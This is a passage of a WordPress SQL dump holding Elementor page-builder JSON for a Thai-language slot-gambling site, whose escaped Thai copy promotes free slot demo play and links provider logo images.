\\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e17\\u0e32\\u0e07\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e17\\u0e35\\u0e48\\u0e14\\u0e35\\u0e17\\u0e35\\u0e48\\u0e2a\\u0e38\\u0e14\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e2a\\u0e31\\u0e21\\u0e1c\\u0e31\\u0e2a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e40\\u0e07\\u0e34\\u0e19 \\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15pg\\u0e1f\\u0e23\\u0e35 \\u0e04\\u0e37\\u0e2d\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e04\\u0e38\\u0e13\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e01\\u0e21\\u0e44\\u0e14\\u0e49\\u0e1f\\u0e23\\u0e35\\u0e17\\u0e38\\u0e01\\u0e04\\u0e48\\u0e32\\u0e22 \\u0e17\\u0e38\\u0e01\\u0e40\\u0e01\\u0e21 \\u0e42\\u0e14\\u0e22\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e1d\\u0e32\\u0e01\\u0e40\\u0e07\\u0e34\\u0e19\\u0e01\\u0e48\\u0e2d\\u0e19 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e1d\\u0e36\\u0e01\\u0e1d\\u0e35\\u0e21\\u0e37\\u0e2d \\u0e23\\u0e27\\u0e21\\u0e16\\u0e36\\u0e07\\u0e2a\\u0e32\\u0e22\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e25\\u0e2d\\u0e07\\u0e2a\\u0e39\\u0e15\\u0e23\\u0e43\\u0e2b\\u0e21\\u0e48 \\u0e46 \\u0e01\\u0e48\\u0e2d\\u0e19\\u0e25\\u0e07\\u0e2a\\u0e19\\u0e32\\u0e21\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e22\\u0e38\\u0e04\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e15\\u0e23\\u0e07 API \\u0e41\\u0e17\\u0e49\\u0e08\\u0e32\\u0e01 USA \\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e21\\u0e32\\u0e41\\u0e23\\u0e07\\u0e17\\u0e35\\u0e48\\u0e2a\\u0e38\\u0e14\\u0e43\\u0e19\\u0e15\\u0e2d\\u0e19\\u0e19\\u0e35\\u0e49 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e21\\u0e35\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e17\\u0e31\\u0e19\\u0e2a\\u0e21\\u0e31\\u0e22 \\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22 \\u0e41\\u0e25\\u0e30\\u0e40\\u0e0a\\u0e37\\u0e48\\u0e2d\\u0e21\\u0e15\\u0e48\\u0e2d\\u0e01\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e43\\u0e2b\\u0e49\\u0e1a\\u0e23\\u0e34\\u0e01\\u0e32\\u0e23\\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21\\u0e42\\u0e14\\u0e22\\u0e15\\u0e23\\u0e07 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e31\\u0e21\\u0e1c\\u0e31\\u0e2a\\u0e1b\\u0e23\\u0e30\\u0e2a\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e13\\u0e4c\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e43\\u0e19\\u0e04\\u0e32\\u0e2a\\u0e34\\u0e42\\u0e19\\u0e15\\u0e48\\u0e32\\u0e07\\u0e1b\\u0e23\\u0e30\\u0e40\\u0e17\\u0e28\\u0e41\\u0e17\\u0e49 \\u0e46 \\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e20\\u0e32\\u0e1e \\u0e40\\u0e2a\\u0e35\\u0e22\\u0e07 \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e2d\\u0e31\\u0e15\\u0e23\\u0e32\\u0e01\\u0e32\\u0e23\\u0e41\\u0e15\\u0e01\\u0e02\\u0e2d\\u0e07\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a \\u0e17\\u0e38\\u0e01\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e2a\\u0e21\\u0e08\\u0e23\\u0e34\\u0e07\\u0e41\\u0e25\\u0e30\\u0e44\\u0e14\\u0e49\\u0e21\\u0e32\\u0e15\\u0e23\\u0e10\\u0e32\\u0e19\\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e42\\u0e25\\u0e01 \\u0e43\\u0e04\\u0e23\\u0e17\\u0e35\\u0e48\\u0e22\\u0e31\\u0e07\\u0e44\\u0e21\\u0e48\\u0e40\\u0e04\\u0e22\\u0e25\\u0e2d\\u0e07\\u0e16\\u0e37\\u0e2d\\u0e27\\u0e48\\u0e32\\u0e1e\\u0e25\\u0e32\\u0e14\\u0e21\\u0e32\\u0e01 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e19\\u0e35\\u0e48\\u0e04\\u0e37\\u0e2d\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e17\\u0e2d\\u0e07\\u0e43\\u0e19\\u0e01\\u0e32\\u0e23\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19\\u0e23\\u0e39\\u0e49\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e01\\u0e48\\u0e2d\\u0e19\\u0e25\\u0e07\\u0e40\\u0e14\\u0e34\\u0e21\\u0e1e\\u0e31\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"953f46b\",\"elType\":\"section\",\"settings\":{\"structure\":\"32\"},\"elements\":[{\"id\":\"cca046d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"6986c03\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/PG_-_Megabet333-Biz.webp\",\"id\":59,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"9ee3b73\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"313c578\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/Microgaming_-_Megabet333-Biz.webp\",\"id\":57,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"053c361\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"60b9d1b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/JILI_-_Megabet333-Biz.webp\",\"id\":54,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d93020a\",\"elType\":\"section\",\"settings\":{\"structure\":\"31\"},\"elements\":[{\"id\":\"68262e3\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"05f18b4\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/JOKER_-_Megabet333-Biz.webp\",\"id\":55,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"268ff30\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"a316455\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/Slot_xo_-_Megabet333-Biz.webp\",\"id\":62,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"db9361a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"5a3a81d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/Pragmatic_-_Megabet333-Biz.webp\",\"id\":58,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),(700,101,'_thumbnail_id','61'),(703,102,'_elementor_edit_mode','builder'),(704,102,'_elementor_template_type','wp-page'),(705,102,'_elementor_version','3.32.5'),(706,102,'_elementor_pro_version','3.32.3'),(707,102,'_wp_page_template','default'),(708,102,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(709,102,'_elementor_data','[{\"id\":\"598df98\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"1de4a1b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"dd4f8a9\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/Slot_demo_play_-_Megabet333-Biz.webp\",\"id\":61,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"aaa47de\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"2a7956e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"a97ca87\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e1f\\u0e23\\u0e35 \\u0e04\\u0e25\\u0e34\\u0e01!\",\"align\":\"justify\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Prompt\",\"typography_font_weight\":\"800\",\"hover_animation\":\"pulse-shrink\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"motion_fx_tilt_direction\":\"negative\",\"_animation\":\"none\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"d82bac9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"763d481\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\",\"align\":\"justify\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Prompt\",\"typography_font_weight\":\"800\",\"hover_animation\":\"pulse-shrink\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"motion_fx_tilt_direction\":\"negative\",\"_animation\":\"none\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b45af85\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"1bdd864\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"6e50ba5\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e23\\u0e27\\u0e21\\u0e17\\u0e38\\u0e01\\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e41\\u0e15\\u0e01\\u0e07\\u0e48\\u0e32\\u0e22\\n \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e21\\u0e32\\u0e41\\u0e23\\u0e07 API \\u0e41\\u0e17\\u0e49 \\u0e08\\u0e32\\u0e01 USA\",\"header_size\":\"h1\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6f8cc97\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p data-start=\\\"354\\\" data-end=\\\"699\\\">\\u0e01\\u0e32\\u0e23\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 megabet \\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e01\\u0e25\\u0e32\\u0e22\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e40\\u0e17\\u0e23\\u0e19\\u0e14\\u0e4c\\u0e22\\u0e2d\\u0e14\\u0e2e\\u0e34\\u0e15\\u0e43\\u0e19\\u0e27\\u0e07\\u0e01\\u0e32\\u0e23\\u0e40\\u0e01\\u0e21\\u0e1e\\u0e19\\u0e31\\u0e19\\u0e2d\\u0e2d\\u0e19\\u0e44\\u0e25\\u0e19\\u0e4c \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e17\\u0e32\\u0e07\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e17\\u0e35\\u0e48\\u0e14\\u0e35\\u0e17\\u0e35\\u0e48\\u0e2a\\u0e38\\u0e14\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e2a\\u0e31\\u0e21\\u0e1c\\u0e31\\u0e2a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e40\\u0e07\\u0e34\\u0e19 \\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15pg\\u0e1f\\u0e23\\u0e35 \\u0e04\\u0e37\\u0e2d\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e04\\u0e38\\u0e13\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e01\\u0e21\\u0e44\\u0e14\\u0e49\\u0e1f\\u0e23\\u0e35\\u0e17\\u0e38\\u0e01\\u0e04\\u0e48\\u0e32\\u0e22 \\u0e17\\u0e38\\u0e01\\u0e40\\u0e01\\u0e21 \\u0e42\\u0e14\\u0e22\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e1d\\u0e32\\u0e01\\u0e40\\u0e07\\u0e34\\u0e19\\u0e01\\u0e48\\u0e2d\\u0e19 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e1d\\u0e36\\u0e01\\u0e1d\\u0e35\\u0e21\\u0e37\\u0e2d \\u0e23\\u0e27\\u0e21\\u0e16\\u0e36\\u0e07\\u0e2a\\u0e32\\u0e22\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e25\\u0e2d\\u0e07\\u0e2a\\u0e39\\u0e15\\u0e23\\u0e43\\u0e2b\\u0e21\\u0e48 \\u0e46 \\u0e01\\u0e48\\u0e2d\\u0e19\\u0e25\\u0e07\\u0e2a\\u0e19\\u0e32\\u0e21\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e22\\u0e38\\u0e04\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e15\\u0e23\\u0e07 API \\u0e41\\u0e17\\u0e49\\u0e08\\u0e32\\u0e01 USA \\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e21\\u0e32\\u0e41\\u0e23\\u0e07\\u0e17\\u0e35\\u0e48\\u0e2a\\u0e38\\u0e14\\u0e43\\u0e19\\u0e15\\u0e2d\\u0e19\\u0e19\\u0e35\\u0e49 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e21\\u0e35\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e17\\u0e31\\u0e19\\u0e2a\\u0e21\\u0e31\\u0e22 \\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22 \\u0e41\\u0e25\\u0e30\\u0e40\\u0e0a\\u0e37\\u0e48\\u0e2d\\u0e21\\u0e15\\u0e48\\u0e2d\\u0e01\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e43\\u0e2b\\u0e49\\u0e1a\\u0e23\\u0e34\\u0e01\\u0e32\\u0e23\\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21\\u0e42\\u0e14\\u0e22\\u0e15\\u0e23\\u0e07 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e31\\u0e21\\u0e1c\\u0e31\\u0e2a\\u0e1b\\u0e23\\u0e30\\u0e2a\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e13\\u0e4c\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e43\\u0e19\\u0e04\\u0e32\\u0e2a\\u0e34\\u0e42\\u0e19\\u0e15\\u0e48\\u0e32\\u0e07\\u0e1b\\u0e23\\u0e30\\u0e40\\u0e17\\u0e28\\u0e41\\u0e17\\u0e49 \\u0e46 \\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e20\\u0e32\\u0e1e \\u0e40\\u0e2a\\u0e35\\u0e22\\u0e07 \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e2d\\u0e31\\u0e15\\u0e23\\u0e32\\u0e01\\u0e32\\u0e23\\u0e41\\u0e15\\u0e01\\u0e02\\u0e2d\\u0e07\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a \\u0e17\\u0e38\\u0e01\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e2a\\u0e21\\u0e08\\u0e23\\u0e34\\u0e07\\u0e41\\u0e25\\u0e30\\u0e44\\u0e14\\u0e49\\u0e21\\u0e32\\u0e15\\u0e23\\u0e10\\u0e32\\u0e19\\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e42\\u0e25\\u0e01 \\u0e43\\u0e04\\u0e23\\u0e17\\u0e35\\u0e48\\u0e22\\u0e31\\u0e07\\u0e44\\u0e21\\u0e48\\u0e40\\u0e04\\u0e22\\u0e25\\u0e2d\\u0e07\\u0e16\\u0e37\\u0e2d\\u0e27\\u0e48\\u0e32\\u0e1e\\u0e25\\u0e32\\u0e14\\u0e21\\u0e32\\u0e01 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e19\\u0e35\\u0e48\\u0e04\\u0e37\\u0e2d\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e17\\u0e2d\\u0e07\\u0e43\\u0e19\\u0e01\\u0e32\\u0e23\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19\\u0e23\\u0e39\\u0e49\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e01\\u0e48\\u0e2d\\u0e19\\u0e25\\u0e07\\u0e40\\u0e14\\u0e34\\u0e21\\u0e1e\\u0e31\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"953f46b\",\"elType\":\"section\",\"settings\":{\"structure\":\"32\"},\"elements\":[{\"id\":\"cca046d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"6986c03\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/PG_-_Megabet333-Biz.webp\",\"id\":59,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"hover_animation\":\"pulse-shrink\",\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":5,\"color\":\"rgba(225.84765625, 21.115681855574877, 21.115681855574877, 0.44)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"9ee3b73\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"313c578\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/Microgaming_-_Megabet333-Biz.webp\",\"id\":57,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"053c361\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"60b9d1b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/JILI_-_Megabet333-Biz.webp\",\"id\":54,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d93020a\",\"elType\":\"section\",\"settings\":{\"structure\":\"31\"},\"elements\":[{\"id\":\"68262e3\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"05f18b4\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/JOKER_-_Megabet333-Biz.webp\",\"id\":55,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"268ff30\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"a316455\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/Slot_xo_-_Megabet333-Biz.webp\",\"id\":62,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"db9361a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"5a3a81d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/Pragmatic_-_Megabet333-Biz.webp\",\"id\":58,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),(710,102,'_thumbnail_id','61'),(725,104,'_elementor_edit_mode','builder'),(726,104,'_elementor_template_type','wp-page'),(727,104,'_elementor_version','3.32.5'),(728,104,'_elementor_pro_version','3.32.3'),(729,104,'_wp_page_template','default'),(730,104,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(731,104,'_elementor_data','[{\"id\":\"598df98\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"1de4a1b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"dd4f8a9\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/Slot_demo_play_-_Megabet333-Biz.webp\",\"id\":61,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"aaa47de\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"2a7956e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"a97ca87\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e1f\\u0e23\\u0e35 